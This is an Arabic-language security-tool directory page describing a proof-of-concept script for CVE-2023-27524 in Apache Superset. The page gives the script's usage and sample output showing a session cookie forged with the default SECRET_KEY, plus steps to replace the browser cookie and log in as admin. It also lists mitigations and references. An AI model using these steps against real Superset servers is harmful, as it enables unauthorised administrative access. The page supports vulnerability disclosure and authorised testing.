Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-27524-POC — إثبات المفهوم لـ CVE-2023-27524 الجديد كليًا والذي يسمح بتجاوز المصادقة والوصول إلى لوحة تحكم المسؤول. | Kitploit
أدوات/GitHubGitHub/maanvader/cve-2023-27524-poc
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmaanvader/cve-2023-27524-poc

CVE-2023-27524-POC

إثبات المفهوم لـ CVE-2023-27524 الجديد كليًا والذي يسمح بتجاوز المصادقة والوصول إلى لوحة تحكم المسؤول.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-27524: تجاوز المصادقة في Apache Superset

نص برمجي للتحقق مما إذا كان خادم Apache Superset معرضًا للثغرة (CVE-2023-27524)، وفي حال كان معرضًا، يتم تزوير كوكي جلسة باستخدام user_id = 1 والذي عادةً ما يكون المستخدم admin، مما يتيح تجاوز المصادقة والوصول إلى لوحة التحكم. حاليًا، هناك حوالي 3000 خادم حول العالم يعملون بنظام Apache Superset.

الاستخدام

root@kitploit:~
usage: python3 CVE-2023-27524.py  --url URL 

مثال أساسي

root@kitploit:~
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard

التخفيفات

اتبع التعليمات هنا لتوليد وتكوين SECRET_KEY خاص بـ Flask. يمكن استخدام أداة سطر الأوامر superset لتدوير SECRET_KEY بحيث يتم الحفاظ على معلومات اتصال قاعدة البيانات الحالية.

إخلاء مسؤولية

تم إنشاء هذا الإثبات لأغراض تعليمية فقط

المراجع

  • https://github.com/horizon3ai/CVE-2023-27524
  • https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
تنزيل الأداة